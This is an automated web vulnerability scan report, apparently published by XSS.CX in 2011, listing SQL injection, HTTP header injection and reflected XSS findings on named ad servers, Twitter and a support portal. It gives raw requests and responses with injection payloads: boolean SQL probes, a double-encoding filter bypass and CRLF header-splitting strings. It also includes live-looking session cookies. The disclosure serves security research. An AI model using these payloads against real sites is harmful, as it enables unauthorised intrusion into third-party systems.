XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, BHDB, 10312011

Report generated by XSS.CX at Tue Nov 01 07:11:34 CDT 2011.

Hoyt LLC Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.


1. SQL injection

1.1. http://a.tribalfusion.com/j.ad [a parameter]

1.2. https://portal.teamsupport.com/login.aspx [OrganizationID parameter]

1.3. http://twitter.com/account/bootstrap_data [k cookie]

2. HTTP header injection

2.1. http://adserver.adtechus.com/ [CRID parameter]

2.2. http://adserver.adtechus.com/ [PLID parameter]

2.3. http://adserver.adtechus.com/ [adlink|3.0|5345|2221988|1|16|AdId parameter]

2.4. http://adserver.adtechus.com/ [cid parameter]

2.5. http://adserver.adtechus.com/ [name of an arbitrarily supplied request parameter]

2.6. http://bidder.mathtag.com/notify [exch parameter]

2.7. http://d.adroll.com/pixel/3LFYGW2GY5AUNBGJEFKFW7/GGBU6EIY6FGOVO4H7YOUOC [REST URL parameter 2]

2.8. http://d.adroll.com/pixel/3LFYGW2GY5AUNBGJEFKFW7/GGBU6EIY6FGOVO4H7YOUOC [REST URL parameter 3]

3. Cross-site scripting (reflected)

3.1. http://a.collective-media.net/adj/q1.politico/home_run_of [REST URL parameter 2]

3.2. http://a.collective-media.net/adj/q1.politico/home_run_of [REST URL parameter 3]

3.3. http://a.collective-media.net/adj/q1.politico/home_run_of [name of an arbitrarily supplied request parameter]

3.4. http://a.collective-media.net/adj/q1.politico/home_run_of [sz parameter]

3.5. http://a.collective-media.net/cmadj/q1.politico/home_run_of [REST URL parameter 1]

3.6. http://a.collective-media.net/cmadj/q1.politico/home_run_of [REST URL parameter 2]

3.7. http://a.collective-media.net/cmadj/q1.politico/home_run_of [REST URL parameter 3]

3.8. http://a.collective-media.net/cmadj/q1.politico/home_run_of [sz parameter]

3.9. http://ad.coupons.com/st [name of an arbitrarily supplied request parameter]

3.10. http://ad.turn.com/server/pixel.htm [fpid parameter]

3.11. http://ad.turn.com/server/pixel.htm [sp parameter]

3.12. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]

3.13. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]

3.14. http://adnxs.revsci.net/imp [Z parameter]

3.15. http://adnxs.revsci.net/imp [s parameter]

3.16. http://ads.adbrite.com/adserver/vdi/742697 [REST URL parameter 3]

3.17. http://ads.adsonar.com/adserving/getAds.jsp [pid parameter]

3.18. http://ads.adsonar.com/adserving/getAds.jsp [placementId parameter]

3.19. http://ads.adsonar.com/adserving/getAds.jsp [ps parameter]

3.20. http://adserving.cpxinteractive.com/st [ad_size parameter]

3.21. http://adserving.cpxinteractive.com/st [section parameter]

3.22. http://api.bizographics.com/v2/profile.redirect [api_key parameter]

3.23. http://b.scorecardresearch.com/beacon.js [c1 parameter]

3.24. http://b.scorecardresearch.com/beacon.js [c10 parameter]

3.25. http://b.scorecardresearch.com/beacon.js [c15 parameter]

3.26. http://b.scorecardresearch.com/beacon.js [c2 parameter]

3.27. http://b.scorecardresearch.com/beacon.js [c3 parameter]

3.28. http://b.scorecardresearch.com/beacon.js [c4 parameter]

3.29. http://b.scorecardresearch.com/beacon.js [c5 parameter]

3.30. http://b.scorecardresearch.com/beacon.js [c6 parameter]

3.31. http://c.brightcove.com/services/messagebroker/amf [3rd AMF string parameter]

3.32. http://cdn.w55c.net/i/0RX1mACGyl_437413582.html [ci parameter]

3.33. http://cdn.w55c.net/i/0RX1mACGyl_437413582.html [ei parameter]

3.34. http://cdn.w55c.net/i/0RX1mACGyl_437413582.html [ob parameter]

3.35. http://connexity.net/c/cse [E parameter]

3.36. http://connexity.net/c/cse [J parameter]

3.37. http://connexity.net/c/cse [L parameter]

3.38. http://couponbar.coupons.com/adblob.asp [AdSize parameter]

3.39. http://couponbar.coupons.com/adblob.asp [npage parameter]

3.40. http://couponbar.coupons.com/adblob.asp [pzn parameter]

3.41. http://couponbar.coupons.com/adblob.asp [spage parameter]

3.42. http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10794/184979/PortalServe/ [REST URL parameter 2]

3.43. http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10794/184979/PortalServe/ [REST URL parameter 3]

3.44. http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10794/184979/PortalServe/ [REST URL parameter 4]

3.45. http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10794/184979/PortalServe/ [REST URL parameter 5]

3.46. http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10794/184979/PortalServe/ [flash parameter]

3.47. http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10794/184979/PortalServe/ [name of an arbitrarily supplied request parameter]

3.48. http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10794/184979/PortalServe/ [pid parameter]

3.49. http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10794/184979/PortalServe/ [pub parameter]

3.50. http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10794/184979/PortalServe/ [r parameter]

3.51. http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10794/184979/PortalServe/ [redir parameter]

3.52. http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10794/184979/PortalServe/ [time parameter]

3.53. http://image3.pubmatic.com/AdServer/UPug [pageURL parameter]

3.54. http://image3.pubmatic.com/AdServer/UPug [ran parameter]

3.55. http://mediaservices-d.openxenterprise.com/w/1.0/afr [auid parameter]

3.56. http://mediaservices-d.openxenterprise.com/w/1.0/afr [cb parameter]

3.57. http://mediaservices-d.openxenterprise.com/w/1.0/afr [name of an arbitrarily supplied request parameter]

3.58. http://mediaservices-d.openxenterprise.com/w/1.0/afr [rm parameter]

3.59. https://portal.teamsupport.com/Telerik.Web.UI.WebResource.axd [_TSM_HiddenField_ parameter]

3.60. http://showadsak.pubmatic.com/AdServer/AdServerServlet [frameName parameter]

3.61. http://showadsak.pubmatic.com/AdServer/AdServerServlet [pageURL parameter]

3.62. http://showadsak.pubmatic.com/AdServer/AdServerServlet [ranreq parameter]

3.63. http://tag.contextweb.com/TagPublish/getjs.aspx [action parameter]

3.64. http://tag.contextweb.com/TagPublish/getjs.aspx [cwadformat parameter]

3.65. http://tag.contextweb.com/TagPublish/getjs.aspx [cwheight parameter]

3.66. http://tag.contextweb.com/TagPublish/getjs.aspx [cwpid parameter]

3.67. http://tag.contextweb.com/TagPublish/getjs.aspx [cwpnet parameter]

3.68. http://tag.contextweb.com/TagPublish/getjs.aspx [cwrun parameter]

3.69. http://tag.contextweb.com/TagPublish/getjs.aspx [cwtagid parameter]

3.70. http://tag.contextweb.com/TagPublish/getjs.aspx [cwwidth parameter]

3.71. http://tag.contextweb.com/TagPublish/getjs.aspx [publisherID parameter]

3.72. http://tag.contextweb.com/TagPublish/getjs.aspx [siteID parameter]

3.73. http://www.lijit.com/delivery/fp [n parameter]

3.74. http://adnxs.revsci.net/imp [Referer HTTP header]

3.75. http://adserving.cpxinteractive.com/st [Referer HTTP header]

3.76. http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10794/184979/PortalServe/ [Referer HTTP header]

3.77. http://www.kayak.com/ [Referer HTTP header]

3.78. http://view.atdmt.com/iaction/adoapn_AppNexusDemoActionTag_1 [AA002 cookie]



1. SQL injection
There are 3 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and to avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://a.tribalfusion.com/j.ad [a parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://a.tribalfusion.com
Path:   /j.ad

Issue detail

The a parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the a parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /j.ad?flashVer=10&ver=1.21&th=7164944469&tagKey=987828525&site=ustream&adSpace=ros&center=1&url=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&f=1&p=7808693&a=1'%20and%201%3d1--%20&rnd=7809966 HTTP/1.1
Host: a.tribalfusion.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ustream.tv/
Cookie: ANON_ID=awnaaayOZbSZcCJTyKqIeGeC1GUn1ZbTSZcOZbZb562ZdefnPf5SXAUtaKeP7Crah2bJOZaxe9Zdc0lqGbrMqWl45yYFHURgr1C5bJph9CNktOynZaj1kgE832M5UlcIQGsKSvEnMb0yhxYXCuuZbY7DF2WeZdxyZcDsZbJcyE7KrZdEjyjng52Zc7VFVZa7HF2NK6edkeGPpmmbbpE9i3xYQqInRfgvL78RPGNdMgmJZat74R0wVQYjArbw5I0qlDb0QirIQ3DxU4uRIxLuKBMrZaCmkZd5P5cJEIuasfVFg4Qp3bnTqZbvmWwyY4pICrV0XAmxGMpEuQZcoLNwooMZcPfBR2dpCuK3703UgmdQ5MAurBOVIaUHg8FaBB9MoMhYpqIjThXDTDfGgXegBPWYG5rJKwFAhNGYdr0A56o

Response 1

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 101
X-Reuse-Index: 1
Pragma: no-cache
Cache-Control: private, no-cache, no-store, proxy-revalidate
Set-Cookie: ANON_ID=avncyBtMPmZcbTgUuMEGcaEWEj2XKjg9XitwCe6eKnafiZdjAtwefY6oKr6a2WnchZcXZaZdtKAyajqpWWN1Zaap9pZbflsZdNRtveZdSHFB7SkShvXlvEy0yZa7xIDyOSRWTJABmbVHc13L7yE7QSDE5daQnYplnMBZcxsbXriP3qZaYPYJShXqsrkEjAqOifJYQQXdbLbU1qeMftsG7M2UmZdog394ScMfZcZcnBuGkYPVgVnbkLdmUuJcsfCYLYynn35H31Zd7vgeW2E8ZbDHAjZbZduZb7ZdxZbBVEwl0HRpRqa22pUt2R9Uyw4HInf90wZbyXtZb6ZauUBovG9UHZb7PuQMTFxDsf3m5ZcZbAVSJauDlNpVIutTqBNs9RtZaoJZaqB6Wqd4gjTb3G99bbCA1SZaGjDMg82cCmOptS8835iAv1FiUN1YTriZavTZa; path=/; domain=.tribalfusion.com; expires=Sun, 29-Jan-2012 19:07:15 GMT;
Content-Type: application/x-javascript
Vary: Accept-Encoding
Content-Length: 394
Expires: 0
Connection: keep-alive

document.write('<center><a target=_blank href="http://a.tribalfusion.com/h.click/aumNnA0U3DUAmp4PnbPAMD4dQyXdrZcpdEv5AZbP5Gj6VsY8WVb8RAQnUWFVWr7P2UerWEUmVqF9STYHSVjJPbupPHviWGnT2FmroWZaOYqyw4dnZbQVZbZa46nIod6nVWF9XFv9YFFfXaisRrMFTrr4Wtr1mbQx2cfFoKmfNQ/http://www.fightarthritispain.org"><img src="http://cdn5.tribalfusion.com/media/2468066.gif" border=0 height=60 width=468 ><\/a><\/center>');

Request 2

GET /j.ad?flashVer=10&ver=1.21&th=7164944469&tagKey=987828525&site=ustream&adSpace=ros&center=1&url=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&f=1&p=7808693&a=1'%20and%201%3d2--%20&rnd=7809966 HTTP/1.1
Host: a.tribalfusion.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ustream.tv/
Cookie: ANON_ID=awnaaayOZbSZcCJTyKqIeGeC1GUn1ZbTSZcOZbZb562ZdefnPf5SXAUtaKeP7Crah2bJOZaxe9Zdc0lqGbrMqWl45yYFHURgr1C5bJph9CNktOynZaj1kgE832M5UlcIQGsKSvEnMb0yhxYXCuuZbY7DF2WeZdxyZcDsZbJcyE7KrZdEjyjng52Zc7VFVZa7HF2NK6edkeGPpmmbbpE9i3xYQqInRfgvL78RPGNdMgmJZat74R0wVQYjArbw5I0qlDb0QirIQ3DxU4uRIxLuKBMrZaCmkZd5P5cJEIuasfVFg4Qp3bnTqZbvmWwyY4pICrV0XAmxGMpEuQZcoLNwooMZcPfBR2dpCuK3703UgmdQ5MAurBOVIaUHg8FaBB9MoMhYpqIjThXDTDfGgXegBPWYG5rJKwFAhNGYdr0A56o

Response 2

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 101
X-Reuse-Index: 1
Pragma: no-cache
Cache-Control: private, no-cache, no-store, proxy-revalidate
Set-Cookie: ANON_ID=aWncyBujieZdC7Yx43dhW6d4cfPR16skIPD4PIvbvbkjlVDZbFk6ZcYPDGqaMYEQgixB7ZbqZcMwTFVyb8mm2fqjdAfldha1aBdFS8ujVGwW2UvhL6jYNTCPLhpoV0D4giuoqVMBInR9vqj3mDbUGZaboXZcFV3QOqWv4nOiAW07SuwKeuqNPaVFNtZbyicN2encey7qW763YjomQL5cQjxeJTPpN3d1sGLXWC0SR0RSnIGdAw42RNb7j6XjvZcVxND1xZbDK2W4BAUUIPQUZc5uR73j8xrNZaSbVOXbfAQ9fDuADZanJKZbZaomZbWIYqOtMQAvQXtgclRoTZaRxUARrS7v1eNq4AHXHEauRLawFmtMTQyRBsGpx4eIGbnTsOMBkygADltlGkvYCZayKPQp6YVZcy2pVYDKf2jMSybOqnwfRr9yXjE; path=/; domain=.tribalfusion.com; expires=Sun, 29-Jan-2012 19:07:16 GMT;
Content-Type: application/x-javascript
Vary: Accept-Encoding
Content-Length: 384
Expires: 0
Connection: keep-alive

document.write('<center><a target=_blank href="http://a.tribalfusion.com/h.click/aVmNnASGbZa5AUZcodanTtQ80Urj1bJjXaisRFFEUbBYTdYXmFJxPF7MYqFt3TJa5TU5maJE1bjcWHb0mAUKnV7mmHnJ3TYh5t6m3mBGmrnZb0GMXYsMV0VBNnTBS5UQTVb7DWPM4REM0QsvrPW7u0tFqVmbpPF3knmf6ro/http://www.liveunited.org"><img src="http://cdn5.tribalfusion.com/media/2468036.jpeg" border=0 height=60 width=468 ><\/a><\/center>');

1.2. https://portal.teamsupport.com/login.aspx [OrganizationID parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   https://portal.teamsupport.com
Path:   /login.aspx

Issue detail

The OrganizationID parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the OrganizationID parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

POST /login.aspx?ReturnUrl=%2fprotected%2fjustarticle.aspx%3fOrganizationID%3d305383%26ArticleID%3d4979&OrganizationID=305383'&ArticleID=4979 HTTP/1.1
Host: portal.teamsupport.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://portal.teamsupport.com/login.aspx?ReturnUrl=%2fprotected%2fjustarticle.aspx%3fOrganizationID%3d305383%26ArticleID%3d4979&OrganizationID=305383&ArticleID=4979
Cookie: ASP.NET_SessionId=q5cuoojovmirb4451hesgsbt
Content-Type: application/x-www-form-urlencoded
Content-Length: 559

__VIEWSTATE=%2FwEPDwULLTE4NTcyNzQwMjQPZBYEAgEPZBYEAgEPFgIeBGhyZWYFDmNzcy9PcmFuZ2UuY3NzZAICDxYCHgRUZXh0ZWQCAw9kFgQCEw8WAh8ABSZCYXNpY1BvcnRhbC5hc3B4P09yZ2FuaXphdGlvbklEPTMwNTM4M2QCGw8PFgIfAWVkZBgBBR5fX0
...[SNIP]...

Response

HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Length: 7260
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P: CP="NON DSP COR CUR TAI PSA IVA IVD HIS OUR DEL SAM OTR UNR STP UNI"
Date: Mon, 31 Oct 2011 19:15:13 GMT

<html>
<head>
<title>Unclosed quotation mark after the character string ''.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;
...[SNIP]...

1.3. http://twitter.com/account/bootstrap_data [k cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://twitter.com
Path:   /account/bootstrap_data

Issue detail

The k cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the k cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the k cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /account/bootstrap_data?aaaa=bbbb%22%3Ess&ccc=dddd&11111=22222&r=0.49585987956606903 HTTP/1.1
Host: twitter.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://twitter.com/
Cookie: guest_id=v1%3A131220472331773196; __qca=P0-140711599-1316475142506; __utma=43838368.1381732871.1312402661.1318449270.1318542605.5; __utmz=43838368.1318542605.5.5.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __utmv=43838368.lang%3A%20en; k=10.34.251.138.1319989287408771%2527; original_referer=ZLhHHTiegr9pnB4MD8ZNfG3v4RAV6ZPG0MrNsX9zrr2ma9yjqlvo%2BQWfDHp1zfhS; external_referer=ZLhHHTiegr9pnB4MD8ZNfG3v4RAV6ZPG0MrNsX9zrr2ma9yjqlvo%2BQWfDHp1zfhS%7C0; _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCKtmelszASIKZmxhc2hJQzonQWN0aW9uQ29u%250AdHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoHaWQiJThm%250AZTZmOGNjN2NmMjY4ZGY1ZDE1Yjc0NmNlYTlhOTk1--0403c34742ccbef4b257f481841eefe9d0e00b15

Response 1

HTTP/1.1 200 OK
Date: Mon, 31 Oct 2011 19:36:51 GMT
Status: 200 OK
X-Transaction: bc69ff5ab1d365f5
ETag: "72fb0adc37f1bc529f28d2b9b4ab3365"-gzip
X-Frame-Options: SAMEORIGIN
Last-Modified: Mon, 31 Oct 2011 19:36:51 GMT
X-Runtime: 0.06115
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-Content-Type-Options: nosniff
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: e9d36f797638f7f45e7dadfb938ca04ab249d209
Set-Cookie: _twitter_sess=BAh7CToPY3JlYXRlZF9hdGwrCKtmelszAToMY3NyZl9pZCIlZmMzZjlmNmU4%250AZTk1MDBlMmY3NzRiZWFhNjg1ZjllYWUiCmZsYXNoSUM6J0FjdGlvbkNvbnRy%250Ab2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7AAY6CkB1c2VkewA6B2lkIiU4ZmU2%250AZjhjYzdjZjI2OGRmNWQxNWI3NDZjZWE5YTk5NQ%253D%253D--2342bd9082128f8246c20053d4a0ef79b26fe626; domain=.twitter.com; path=/; HttpOnly
X-XSS-Protection: 1; mode=block
Vary: Accept-Encoding
Content-Length: 25478
Server: tfe

{"requestCacheSeedData":[],"twttr":{"payload":{"profiling":false,"conditionalTemplates":{}},"isPreflight":false,"languages":[{"css_classes":"western nl","name":"Nederlands","localized_name":"Dutch","c
...[SNIP]...
HowToBeAGentleman moves to Saturdays 8:30\/7:30c Beginning October 15th!","screen_name":"How2BeGentleman"},{"name":"Kickstarter","profile_image_url":"http:\/\/a1.twimg.com\/profile_images\/1150349488\/stacked_logo_twitter_2_normal.jpg","id":16186995,"description":"Kickstarter is the world's largest funding platform for creative projects.","screen_name":"kickstarter"},{"name":"OMGFacts","profile_image_url
...[SNIP]...

Request 2

GET /account/bootstrap_data?aaaa=bbbb%22%3Ess&ccc=dddd&11111=22222&r=0.49585987956606903 HTTP/1.1
Host: twitter.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://twitter.com/
Cookie: guest_id=v1%3A131220472331773196; __qca=P0-140711599-1316475142506; __utma=43838368.1381732871.1312402661.1318449270.1318542605.5; __utmz=43838368.1318542605.5.5.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __utmv=43838368.lang%3A%20en; k=10.34.251.138.1319989287408771%2527%2527; original_referer=ZLhHHTiegr9pnB4MD8ZNfG3v4RAV6ZPG0MrNsX9zrr2ma9yjqlvo%2BQWfDHp1zfhS; external_referer=ZLhHHTiegr9pnB4MD8ZNfG3v4RAV6ZPG0MrNsX9zrr2ma9yjqlvo%2BQWfDHp1zfhS%7C0; _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCKtmelszASIKZmxhc2hJQzonQWN0aW9uQ29u%250AdHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoHaWQiJThm%250AZTZmOGNjN2NmMjY4ZGY1ZDE1Yjc0NmNlYTlhOTk1--0403c34742ccbef4b257f481841eefe9d0e00b15

Response 2

HTTP/1.1 200 OK
Date: Mon, 31 Oct 2011 19:36:52 GMT
Status: 200 OK
X-Transaction: 90744c629456d446
ETag: "011492e3dcf4fe05e44956774a7acfbc"-gzip
X-Frame-Options: SAMEORIGIN
Last-Modified: Mon, 31 Oct 2011 19:36:52 GMT
X-Runtime: 0.05344
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-Content-Type-Options: nosniff
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: 6f3092b2ceea06aa42e9c3380e4212554bede1fe
Set-Cookie: _twitter_sess=BAh7CToPY3JlYXRlZF9hdGwrCKtmelszAToMY3NyZl9pZCIlZmMzZjlmNmU4%250AZTk1MDBlMmY3NzRiZWFhNjg1ZjllYWUiCmZsYXNoSUM6J0FjdGlvbkNvbnRy%250Ab2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7AAY6CkB1c2VkewA6B2lkIiU4ZmU2%250AZjhjYzdjZjI2OGRmNWQxNWI3NDZjZWE5YTk5NQ%253D%253D--2342bd9082128f8246c20053d4a0ef79b26fe626; domain=.twitter.com; path=/; HttpOnly
X-XSS-Protection: 1; mode=block
Vary: Accept-Encoding
Content-Length: 25297
Server: tfe

{"requestCacheSeedData":[],"twttr":{"payload":{"profiling":false,"conditionalTemplates":{}},"isPreflight":false,"languages":[{"css_classes":"western nl","name":"Nederlands","localized_name":"Dutch","c
...[SNIP]...

2. HTTP header injection
There are 8 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


2.1. http://adserver.adtechus.com/ [CRID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /

Issue detail

The value of the CRID request parameter is copied into the Location response header. The payload 29621%0d%0a6044376590c was submitted in the CRID parameter. This caused a response containing an injected HTTP header.

Request

GET /?adlink|3.0|5345|2221988|1|16|AdId=2141194;BnId=1;link=http://www.coupons.com/alink.asp?go=13306iq3710&PLID=MEDIAADS&CRID=29621%0d%0a6044376590c&cid=16362179~16362182~16362184~16362186~16362373~16362376~16362378~16362382~16362387~16362391~16362395~16362398~16363002 HTTP/1.1
Host: adserver.adtechus.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.coupons.com/couponweb/Register.aspx?pid=13306&zid=iq37&nid=10
Cookie: JEB2=NOID; OptOut=we will not set any more cookies; s_pers=%20s_getnr%3D1316296602252-New%7C1379368602252%3B%20s_nrgvo%3DNew%7C1379368602253%3B

Response

HTTP/1.0 302 Moved Temporarily
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Location: http://www.coupons.com/alink.asp?go=13306iq3710&PLID=MEDIAADS&CRID=29621
6044376590c
&cid=16362179~16362182~16362184~16362186~16362373~16362376~16362378~16362382~16362387~16362391~16362395~16362398~16363002
Content-Length: 0


2.2. http://adserver.adtechus.com/ [PLID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /

Issue detail

The value of the PLID request parameter is copied into the Location response header. The payload ee682%0d%0a247f36ca75a was submitted in the PLID parameter. This caused a response containing an injected HTTP header.

Request

GET /?adlink|3.0|5345|2221988|1|16|AdId=2141194;BnId=1;link=http://www.coupons.com/alink.asp?go=13306iq3710&PLID=ee682%0d%0a247f36ca75a&CRID=SCJ102411sitewrap&cid=16362179~16362182~16362184~16362186~16362373~16362376~16362378~16362382~16362387~16362391~16362395~16362398~16363002 HTTP/1.1
Host: adserver.adtechus.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.coupons.com/couponweb/Register.aspx?pid=13306&zid=iq37&nid=10
Cookie: JEB2=NOID; OptOut=we will not set any more cookies; s_pers=%20s_getnr%3D1316296602252-New%7C1379368602252%3B%20s_nrgvo%3DNew%7C1379368602253%3B

Response

HTTP/1.0 302 Moved Temporarily
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Location: http://www.coupons.com/alink.asp?go=13306iq3710&PLID=ee682
247f36ca75a
&CRID=SCJ102411sitewrap&cid=16362179~16362182~16362184~16362186~16362373~16362376~16362378~16362382~16362387~16362391~16362395~16362398~16363002
Content-Length: 0


2.3. http://adserver.adtechus.com/ [adlink|3.0|5345|2221988|1|16|AdId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /

Issue detail

The value of the adlink|3.0|5345|2221988|1|16|AdId request parameter is copied into the Location response header. The payload 39301%0d%0aa06bcb1f098 was submitted in the adlink|3.0|5345|2221988|1|16|AdId parameter. This caused a response containing an injected HTTP header.

